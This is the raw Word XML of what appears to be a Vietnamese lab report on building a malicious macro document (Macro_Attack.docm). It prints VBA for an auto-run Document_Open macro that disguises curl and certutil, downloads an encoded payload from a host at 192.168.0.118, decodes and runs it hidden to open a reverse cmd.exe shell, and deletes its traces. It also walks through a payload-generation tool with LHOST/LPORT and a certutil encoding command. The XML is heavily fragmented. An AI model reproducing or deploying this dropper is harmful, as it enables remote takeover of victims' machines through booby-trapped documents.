      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0071278E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ActiveDocument.Path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0071278E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+ "\curl.exe &amp; " </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5C93B5" w14:textId="77777777" w:rsidR="00A32012" w:rsidRPr="00A32012" w:rsidRDefault="00A32012" w:rsidP="00A32012">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="14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ript = script + "del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" &amp; " </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9B5907" w14:textId="77777777" w:rsidR="00A32012" w:rsidRPr="00A32012" w:rsidRDefault="00A32012" w:rsidP="00A32012">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="14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ript = script + "del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strPath_curl_exe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" &amp; " </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB325F4" w14:textId="77777777" w:rsidR="00A32012" w:rsidRPr="00A32012" w:rsidRDefault="00A32012" w:rsidP="00A32012">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1437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ript = script + "del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>strPath_payload_txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A3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" &amp; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C3D542" w14:textId="77777777" w:rsidR="00C835F1" w:rsidRPr="00A32012" w:rsidRDefault="00CE717E" w:rsidP="00C835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Chạy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file payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD93A18" w14:textId="77777777" w:rsidR="00C835F1" w:rsidRPr="00A32012" w:rsidRDefault="00C835F1" w:rsidP="00C835F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1437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script = script + "START /MIN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-e cmd.exe -d &amp; "</w:t>
      </w:r>
      <w:r w:rsidR="00C327AE" w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="61965A85" w14:textId="77777777" w:rsidR="00C835F1" w:rsidRPr="00A32012" w:rsidRDefault="00C835F1" w:rsidP="00C835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cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601B9C2C" w14:textId="77777777" w:rsidR="00C835F1" w:rsidRPr="00A32012" w:rsidRDefault="00C835F1" w:rsidP="00C835F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1437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>script = script + “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>exit ”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1E43277E" w14:textId="77777777" w:rsidR="00C327AE" w:rsidRPr="00A32012" w:rsidRDefault="00C327AE" w:rsidP="00C835F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A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5:</w:t>
      </w:r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tạ</w:t>
      </w:r>
      <w:r w:rsidR="00A32012" w:rsidRPr="00A3201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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114EC8A5" w14:textId="77777777" w:rsidR="00C327AE" w:rsidRPr="00A32012" w:rsidRDefault="00C327AE" w:rsidP="00C327AE">
      <w:pPr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ab/>
      </w:r>
      <w:r w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Shell(script)</w:t>
      </w:r>
      <w:r w:rsidR="00C835F1" w:rsidRPr="00A3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5F1" w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vbHidden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16741A71" w14:textId="77777777" w:rsidR="00BF18C5" w:rsidRPr="00A32012" w:rsidRDefault="00BF18C5" w:rsidP="00BF18C5">
      <w:pPr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32012" w:rsidRPr="00A32012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A32012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012" w:rsidRPr="00A3201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32012" w:rsidRPr="00A3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2012" w:rsidRPr="00A3201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A32012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012" w:rsidRPr="00A3201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A32012" w:rsidRPr="00A32012"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 w:rsidR="00A32012" w:rsidRPr="00A3201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A32012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012" w:rsidRPr="00A3201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A32012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012" w:rsidRPr="00A32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32012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012" w:rsidRPr="00A320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32012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012" w:rsidRPr="00A3201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A32012" w:rsidRPr="00A32012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A32012" w:rsidRPr="00A3201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32012" w:rsidRPr="00A3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012" w:rsidRPr="00A3201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32012" w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2712E0" w14:textId="77777777" w:rsidR="00A32012" w:rsidRPr="00A32012" w:rsidRDefault="00A32012" w:rsidP="00A32012">
      <w:pPr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ab/>
        <w:t xml:space="preserve">Private Sub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Document_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A3201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2012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190C1390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Dim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As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F573C46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Dim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As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B035C6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Dim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url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As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130BDFF3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Dim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As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499B19C9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Dim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As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3909D0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D3A4994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\download.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50258483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lastRenderedPageBreak/>
        <w:t>strPath_curl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\download.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5975F3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url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= "http://192.168.0.118/share/quyet.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650EB561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\dung+quyet.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00513CBC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\quyet.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47939A64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496BA9C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>Dim script As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2581B117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>script = script + "C:\Windows\System32\cmd.exe /c "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B737E97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>script = script + "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xcopy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C:\Windows\System32\curl.exe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&amp; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CC72C0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A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="gram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= script + "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certutil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-encode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+ "\curl.exe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+ " &amp; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765AE805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>script = script + "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ertutil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-decode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&amp; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1883F178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script = script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url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-o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&amp; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D34091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>script = script + "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certutil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-decode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&amp; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B60C873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A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="gram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= script + "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del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" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ActiveDocument.Path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> + "\curl.exe &amp; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF6D272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script = script + "del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&amp; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F44430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script = script + "del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curl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&amp; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE8F168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script = script + "del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txt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&amp; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4581E1F2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script = script + "START /MIN " +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strPath_payload_exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> + " -e cmd.exe -d &amp; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C5DF7A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>script = script + "exit "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1B07A4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400DA85" w14:textId="77777777" w:rsidR="00A32012" w:rsidRPr="00A32012" w:rsidRDefault="00A32012" w:rsidP="00A32012">
      <w:pPr>
        <w:ind w:left="144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 xml:space="preserve">Shell (script), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vbHidden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3FCC0625" w14:textId="77777777" w:rsidR="00A32012" w:rsidRDefault="00A32012" w:rsidP="00A32012">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11148D84" w14:textId="77777777" w:rsidR="00A32012" w:rsidRPr="00A32012" w:rsidRDefault="00A32012" w:rsidP="00641D45">
      <w:pPr>
        <w:ind w:left="357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641D45">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>docm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00641D45">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C85ACC9" w14:textId="77777777" w:rsidR="00280402" w:rsidRPr="00802F4E" w:rsidRDefault="00641D45" w:rsidP="002804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2F4E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802F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2F4E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802F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2F4E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802F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2F4E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802F4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> file word </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F4E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802F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2F4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hại</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F427ED4" w14:textId="77777777" w:rsidR="002571BF" w:rsidRPr="00802F4E" w:rsidRDefault="002571BF" w:rsidP="00802F4E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802F4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0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F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0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F4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0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F4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02F4E"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 w:rsidRPr="00802F4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80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F4E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="00802F4E" w:rsidRPr="00802F4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05083C66" w14:textId="77777777" w:rsidR="002571BF" w:rsidRDefault="00802F4E" w:rsidP="00802F4E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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ED516" wp14:editId="75916110">
            <wp:extent cx="2811780" cy="367636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3782" cy="36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BD11" w14:textId="77777777" w:rsidR="00C91906" w:rsidRPr="005924B6" w:rsidRDefault="00C91906" w:rsidP="00802F4E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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2.3.1.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Quy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xây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dựng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file word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độc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hại</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65BF0EDD" w14:textId="77777777" w:rsidR="002571BF" w:rsidRDefault="002571BF" w:rsidP="002571BF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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AA1E62" w14:textId="77777777" w:rsidR="002571BF" w:rsidRDefault="002571BF" w:rsidP="00C91906">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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5AC3B" wp14:editId="3CED325E">
            <wp:extent cx="5943600" cy="813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773C" w14:textId="77777777" w:rsidR="00C91906" w:rsidRPr="00C91906" w:rsidRDefault="00C91906" w:rsidP="00C91906">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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1906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91906">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C91906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C919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906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C919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906">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cụ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C919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906">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sử</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C919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906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Pr="00C919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906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C919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906">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tạo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C91906">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> file word </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C91906">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>độc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C919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906">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hại</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2057065A" w14:textId="77777777" w:rsidR="002571BF" w:rsidRDefault="002571BF" w:rsidP="002571BF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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59B5E19" w14:textId="77777777" w:rsidR="002571BF" w:rsidRDefault="002571BF" w:rsidP="002571B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load_Bypass.exe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yload Reverse TCP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exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7475AFC8" w14:textId="77777777" w:rsidR="002571BF" w:rsidRDefault="002571BF" w:rsidP="002571B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tu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ay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xt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E58F87" w14:textId="54B7AD65" w:rsidR="002571BF" w:rsidRDefault="002571BF" w:rsidP="002571B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cro_Att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docm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2583DC0D" w14:textId="727BC912" w:rsidR="00C70F08" w:rsidRPr="00C70F08" w:rsidRDefault="00C70F08" w:rsidP="00C70F08">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C70F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC02242" w14:textId="77777777" w:rsidR="002571BF" w:rsidRDefault="002571BF" w:rsidP="002571BF">
      <w:pPr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BEF0D40" w14:textId="77777777" w:rsidR="002571BF" w:rsidRDefault="002571BF" w:rsidP="002571BF">
      <w:pPr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yload Reverse TCP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exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDC30D5" w14:textId="77777777" w:rsidR="00802F4E" w:rsidRDefault="00802F4E" w:rsidP="00802F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F4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nháy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0080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F4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>đúp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0080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F4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02F4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool Payload_Bypass.ex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64A3A77" w14:textId="77777777" w:rsidR="00802F4E" w:rsidRDefault="00802F4E" w:rsidP="005924B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B21F4E" wp14:editId="3667E767">
            <wp:extent cx="5135880" cy="1591070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8687" b="66232"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5164461" cy="159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1ADF6" w14:textId="77777777" w:rsidR="005924B6" w:rsidRPr="005924B6" w:rsidRDefault="005924B6" w:rsidP="005924B6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2.3.4. Giao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cụ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Payload_Bypass.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336BA231" w14:textId="41676024" w:rsidR="00802F4E" w:rsidRDefault="00802F4E" w:rsidP="00802F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LHOST, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LPORT</w:t>
      </w:r>
      <w:r w:rsidR="00EE62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6290">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>444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er</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4339F3E3" w14:textId="77777777" w:rsidR="00802F4E" w:rsidRDefault="00802F4E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251BD4" wp14:editId="69A983CE">
            <wp:extent cx="5425440" cy="20040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4332"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5431650" cy="200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2D40" w14:textId="77777777" w:rsidR="005924B6" w:rsidRPr="005924B6" w:rsidRDefault="005924B6" w:rsidP="005924B6">
      <w:pPr>
        <w:ind w:left="71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2.3.5.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i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cụ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005924B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload_Bypass.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2AA54C" w14:textId="77777777" w:rsidR="00802F4E" w:rsidRDefault="00802F4E" w:rsidP="00802F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ol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ayload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32144587" w14:textId="2792930F" w:rsidR="00802F4E" w:rsidRDefault="004C5BD6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r w:rsidRPr="004C5B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07EFA" wp14:editId="7CDF4D2C">
            <wp:extent cx="5943600" cy="6051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1B9E" w14:textId="77777777" w:rsidR="005924B6" w:rsidRPr="00802F4E" w:rsidRDefault="005924B6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6.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ayload.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217C527E" w14:textId="77777777" w:rsidR="002571BF" w:rsidRDefault="002571BF" w:rsidP="00802F4E">
      <w:pPr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ay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xt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39757A4D" w14:textId="77777777" w:rsidR="00802F4E" w:rsidRDefault="00802F4E" w:rsidP="00802F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE19D3C" w14:textId="77777777" w:rsidR="00802F4E" w:rsidRDefault="00802F4E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284449" wp14:editId="55D09A9B">
            <wp:extent cx="5364480" cy="3017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5024" cy="30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E8A7" w14:textId="77777777" w:rsidR="005924B6" w:rsidRDefault="005924B6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7.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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503F3133" w14:textId="77777777" w:rsidR="00802F4E" w:rsidRDefault="00802F4E" w:rsidP="00802F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4F45F9" w14:textId="77777777" w:rsidR="00A72B29" w:rsidRDefault="00A72B29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C81057" wp14:editId="1C279FE4">
            <wp:extent cx="5363595" cy="1143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7231"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5376172" cy="114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3022" w14:textId="77777777" w:rsidR="005924B6" w:rsidRDefault="005924B6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8.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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270F578D" w14:textId="77777777" w:rsidR="00A72B29" w:rsidRDefault="00A72B29" w:rsidP="00A72B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yload Reverse TCP file exe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129E95D7" w14:textId="77777777" w:rsidR="00A72B29" w:rsidRDefault="00A72B29" w:rsidP="00A72B29">
      <w:pPr>
        <w:ind w:left="717"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A72B29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>certutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A72B29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -encode G:\Bypass\tools\payload.exe G:\Bypass\tools\payload.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E715DF" w14:textId="77777777" w:rsidR="00A72B29" w:rsidRDefault="00A72B29" w:rsidP="00A72B29">
      <w:pPr>
        <w:ind w:left="7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er.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043EF1C5" w14:textId="77777777" w:rsidR="00A72B29" w:rsidRDefault="00A72B29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2DAFD7" wp14:editId="6EBFA5EB">
            <wp:extent cx="5364480" cy="123967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534" cy="12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B94D" w14:textId="77777777" w:rsidR="005924B6" w:rsidRPr="00A72B29" w:rsidRDefault="005924B6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9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u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ayload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584ABBA7" w14:textId="77777777" w:rsidR="00A72B29" w:rsidRDefault="00A72B29" w:rsidP="00A72B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ayload.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460DD919" w14:textId="6F369C4C" w:rsidR="00A72B29" w:rsidRDefault="004C5BD6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r w:rsidRPr="004C5B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7106A" wp14:editId="41D7F2AB">
            <wp:extent cx="5943600" cy="7461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6F59" w14:textId="11DD992C" w:rsidR="005924B6" w:rsidRDefault="005924B6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10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ayload.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1D3389" w14:textId="77777777" w:rsidR="00C70F08" w:rsidRPr="00C70F08" w:rsidRDefault="00C70F08" w:rsidP="00C70F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0F0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ý: File .exe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khoảng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6565 KB, file .txt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khoảng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9027 KB (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ra file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khoảng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vài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trăm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KB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lỗi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chạy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08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C70F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D49FA88" w14:textId="77777777" w:rsidR="00C70F08" w:rsidRPr="00A72B29" w:rsidRDefault="00C70F08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</w:p>
    <w:p w14:paraId="081265F4" w14:textId="77777777" w:rsidR="002571BF" w:rsidRDefault="002571BF" w:rsidP="002571BF">
      <w:pPr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Bướ</w:t>
      </w:r>
      <w:r w:rsidR="00802F4E" w:rsidRPr="006C4EF0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802F4E" w:rsidRPr="006C4EF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C4E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F4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802F4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload Reverse TCP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00802F4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80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F4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802F4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> file txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00802F4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802F4E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44DDF318" w14:textId="77777777" w:rsidR="00A72B29" w:rsidRDefault="00A72B29" w:rsidP="000B5A8B">
      <w:pPr>
        <w:ind w:left="357" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr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Server </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A72B29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
